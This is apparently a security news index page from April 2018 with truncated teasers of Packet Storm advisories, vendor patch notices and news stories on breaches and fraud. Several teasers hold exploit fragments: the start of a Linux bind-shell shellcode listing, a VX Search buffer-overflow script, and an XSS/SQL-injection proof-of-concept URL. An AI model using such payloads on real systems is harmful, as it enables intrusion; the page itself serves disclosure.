Security

Seagate Media Server Path Traversal ≈ Packet Storm

————————————————————————Seagate Media Server path traversal vulnerability————————————————————————Yorick Koster, September 2017 ————————————————————————Abstract————————————————————————Seagate Personal Cloud is a consumer-grade Network-Attached Storagedevice (NAS). It was found that Seagate Media Server is vulnerable topath traversal that allows unauthenticated attackers to downloadarbitrary files from the NAS. Since Seagate Media Server runs with rootprivileges it is possible to exploit this issue to retrieve […]

Security

Seagate Personal Cloud SRN21C Arbitrary File Move ≈ Packet Storm

————————————————————————Seagate Personal Cloud allows moving of arbitrary files————————————————————————Yorick Koster, September 2017 ————————————————————————Abstract————————————————————————Seagate Personal Cloud is a consumer-grade Network-Attached Storagedevice (NAS). It was found that the web application used to manage theNAS contains a vulnerability that allows an unauthenticated attacker tomove arbitrary files. The move operation is done with root privileges,which basically allows moving any file […]

Security

Seagate Media Server SRN21C Cross Site Scripting ≈ Packet Storm

————————————————————————Seagate Media Server stored Cross-Site Scripting vulnerability————————————————————————Yorick Koster, September 2017 ————————————————————————Abstract————————————————————————Seagate Personal Cloud is a consumer-grade Network-Attached Storagedevice (NAS). By default Seagate Media Server allows unauthenticatedusers to upload files to a public share. Once a file is uploaded it canalso be downloaded again from the NAS. No restrictions are enforced on which file types a […]

Security

Ubuntu Security Notice USN-3627-1 ≈ Packet Storm

==========================================================================Ubuntu Security Notice USN-3627-1April 19, 2018 apache2 vulnerabilities========================================================================== A security issue affects these releases of Ubuntu and its derivatives: – Ubuntu 17.10– Ubuntu 16.04 LTS– Ubuntu 14.04 LTS Summary: Several security issues were fixed in the Apache HTTP Server. Software Description:– apache2: Apache HTTP server Details: Alex Nichols and Jakob Hirsch discovered that the Apache […]

Security

Ubuntu Security Notice USN-3628-1 ≈ Packet Storm

==========================================================================Ubuntu Security Notice USN-3628-1April 19, 2018 openssl vulnerability========================================================================== A security issue affects these releases of Ubuntu and its derivatives: – Ubuntu 17.10– Ubuntu 16.04 LTS– Ubuntu 14.04 LTS Summary: OpenSSL could allow access to sensitve information. Software Description:– openssl: Secure Socket Layer (SSL) cryptographic library and tools Details: Alejandro Cabrera Aldaya, Billy Brumley, Cesar Pereida […]

Security

Ubuntu Security Notice USN-3628-2 ≈ Packet Storm

==========================================================================Ubuntu Security Notice USN-3628-2April 19, 2018 openssl vulnerability========================================================================== A security issue affects these releases of Ubuntu and its derivatives: – Ubuntu 12.04 ESM Summary: OpenSSL could allow access to sensitve information. Software Description:– openssl: Secure Socket Layer (SSL) cryptographic library and tools Details: USN-3628-1 fixed a vulnerability in OpenSSL. This update providesthe corresponding update for […]

Security

Red Hat Security Advisory 2018-1188-01 ≈ Packet Storm

—–BEGIN PGP SIGNED MESSAGE—–Hash: SHA1 =====================================================================Red Hat Security Advisory Synopsis: Critical: java-1.8.0-openjdk security updateAdvisory ID: RHSA-2018:1188-01Product: Red Hat Enterprise LinuxAdvisory URL: https://access.redhat.com/errata/RHSA-2018:1188Issue date: 2018-04-19CVE Names: CVE-2018-2790 CVE-2018-2794 CVE-2018-2795 CVE-2018-2796 CVE-2018-2797 CVE-2018-2798 CVE-2018-2799 CVE-2018-2800 CVE-2018-2814 CVE-2018-2815 ===================================================================== 1. Summary: An update for java-1.8.0-openjdk is now available for Red Hat EnterpriseLinux 6. Red Hat Product Security has […]

Security

Red Hat Security Advisory 2018-1191-01 ≈ Packet Storm

—–BEGIN PGP SIGNED MESSAGE—–Hash: SHA1 =====================================================================Red Hat Security Advisory Synopsis: Critical: java-1.8.0-openjdk security updateAdvisory ID: RHSA-2018:1191-01Product: Red Hat Enterprise LinuxAdvisory URL: https://access.redhat.com/errata/RHSA-2018:1191Issue date: 2018-04-19CVE Names: CVE-2018-2790 CVE-2018-2794 CVE-2018-2795 CVE-2018-2796 CVE-2018-2797 CVE-2018-2798 CVE-2018-2799 CVE-2018-2800 CVE-2018-2814 CVE-2018-2815 ===================================================================== 1. Summary: An update for java-1.8.0-openjdk is now available for Red Hat EnterpriseLinux 7. Red Hat Product Security has […]

Security

JP Morgan reportedly had to oust a security chief backed by Palantir

J.P. Morgan Chase reportedly ousted its “special operations” head after learning that his insider security group had started spying on the bank’s top executives. With the help of more than 100 engineers from the data mining company Palantir, Peter Cavicchia III collected emails, browser histories and GPS locations from company phones, as well as transcripts […]

Security

Oracle whips out the swatter, squishes 254 security bugs in its gear • The Register

Oracle this week emitted its April security update, addressing a total of 254 security vulnerabilities across dozens of products. Among the more noteworthy patches is a fix for lingering Spectre-related vulnerabilities in Solaris systems – specifically, CVE-2017-5753, also known as Spectre variant 1. Oracle had mitigated most of the Spectre/Meltdown processor design bugs in its […]

Security

LinkedIn bug allowed data to be stolen from user profiles

(Image: ZDNet) A bug in how LinkedIn autofills data on other websites could have allowed an attacker to silently steal user profile data. The flaw was found in LinkedIn’s widely used AutoFill plugin, which allows approved third-party websites to let LinkedIn members automatically fill in basic information from their profile — such as their name, […]

Security

Facebook to exclude billions from European privacy laws

Image copyright Getty Images Image caption A total of 1.5 billion users who had previously been under the jurisdiction of Facebook Ireland will have that moved to US headquarters Facebook has changed its terms of service, meaning 1.5 billion members will not be protected under tough new privacy protections coming to Europe. The move comes […]

Security

Ikea’s TaskRabbit app back online after data breach

Image copyright TaskRabbit Image caption TaskRabbit is an odd jobs marketplace Ikea’s odd jobs marketplace TaskRabbit is back online, following a “cyber-security incident” on Monday. TaskRabbit lets people find freelance workers to complete household tasks such as cleaning, gardening or assembling flat-pack furniture. The company says an “unauthorised user gained access to our systems” and […]

Security

Gold Galleon hackers target maritime shipping industry

File Photo Researchers have uncovered a Nigerian hacking ring which targets maritime shipping firms in order to try and steal millions of dollars on an annual basis. On Wednesday, security experts from the Secureworks Counter Threat Unit (CTU) said that the previously unidentified “Gold Galleon” threat group specializes in business email compromise (BEC) and business […]

Security

Linux x86 TCP Port 1337 Bindshell Shellcode ≈ Packet Storm

/**# Linux x86 Bind TCP shellcode# This shellcode will listen on port 1337 and give you /bin/sh# Shellcode Author: Anurag Srivastava# Shellcode Length: 92# Student-ID: SLAE-1219# Note ~ http://www.theanuragsrivastava.in/2018/04/bind-tcp-shellcode-x86-slae-assignment.html Disassembly of section .text: 08048060 <_start>:8048060: 6a 66 push 0x668048062: 58 pop eax8048063: 31 db xor ebx,ebx8048065: 53 push ebx8048066: 43 inc ebx8048067: 53 push ebx8048068: […]

Security

PCI Council releases vastly expanded cards-in-clouds guidance • The Register

The Payment Card Industry Security Standards Council (PCI SSC) has issued a big update to its guidance on using payment cards with cloud computing services. A lot has happened in the cloud since 2013, when the last version was published. Which may explain why Wednesday’s version three hit 83 pages, 31 pages more than version […]

Security

WebKitGTK+ Code Execution / Memory Corruption ≈ Packet Storm

————————————————————————WebKitGTK+ Security Advisory WSA-2018-0003———————————————————————— Date reported : April 04, 2018Advisory ID : WSA-2018-0003Advisory URL : https://webkitgtk.org/security/WSA-2018-0003.htmlCVE identifiers : CVE-2018-4101, CVE-2018-4113, CVE-2018-4114,CVE-2018-4117, CVE-2018-4118, CVE-2018-4119,CVE-2018-4120, CVE-2018-4122, CVE-2018-4125,CVE-2018-4127, CVE-2018-4128, CVE-2018-4129,CVE-2018-4133, CVE-2018-4146, CVE-2018-4161,CVE-2018-4162, CVE-2018-4163, CVE-2018-4165. Several vulnerabilities were discovered in WebKitGTK+. CVE-2018-4101Versions affected: WebKitGTK+ before 2.20.0.Credit to Yuan Deng of Ant-financial Light-Year Security Lab.Impact: Processing maliciously crafted web content […]

Security

VX Search 10.6.18 Local Buffer Overflow ≈ Packet Storm

#!/usr/bin/python# Title: VX Search 10.6.18 Local Buffer Overflow# Author: Kevin McGuigan# Twitter: @_h3xagram# Author Website: https://www.7elements.co.uk# Vendor Website: http://www.vxsearch.com# Version: 10.6.18# Date: 18/04/2018# Tested on: Windows 7 32-bit# Vendor did not respond to advisory. # Copy the contents of vxsearchpoc.txt, click the Server icon and paste into the directory field. filename=”vxsearchPOC.txt”junk = “A”*271#0x652c2a1a : “jmp […]

Security

MySQL Squid Access Report 2.1.4 Cross Site Scripting / SQL Injection ≈ Packet Storm

# Exploit Title: MySQL Squid Access Report 2.1.4 Multiple Vulnerabilities# Date: 14-13-2018# Software Link: https://sourceforge.net/projects/mysar/# Exploit Author: Keerati T.# Version: 2.1.4# Tested on: Linux1. DescriptionSQL injection and Cross site script vulnerabilities are found on ALLparameter of MySAR.2. Proof of ConceptFOR EXAMPLE- SQL injectionhttp://server/mysar/index.php?a=IPSummary&date=[SQLi]-XSShttp://server/mysar/index.php?a=IPSummary&date=2018-04-14″><script>alert(1)</script>3. Timeline8-3-2018 – Report on their Github. (https://github.com/coffnix/mysar-ng/issues/12)– 1 month later, no any […]

Security

Red Hat Security Advisory 2018-1170-01 ≈ Packet Storm

—–BEGIN PGP SIGNED MESSAGE—–Hash: SHA1 =====================================================================Red Hat Security Advisory Synopsis: Important: kernel-rt security and bug fix updateAdvisory ID: RHSA-2018:1170-01Product: Red Hat Enterprise MRG for RHEL-6Advisory URL: https://access.redhat.com/errata/RHSA-2018:1170Issue date: 2018-04-17CVE Names: CVE-2017-8824 CVE-2017-9725 CVE-2017-13166 CVE-2017-15265 CVE-2017-17449 CVE-2017-18017 CVE-2017-1000410 ===================================================================== 1. Summary: An update for kernel-rt is now available for Red Hat Enterprise MRG 2. Red Hat […]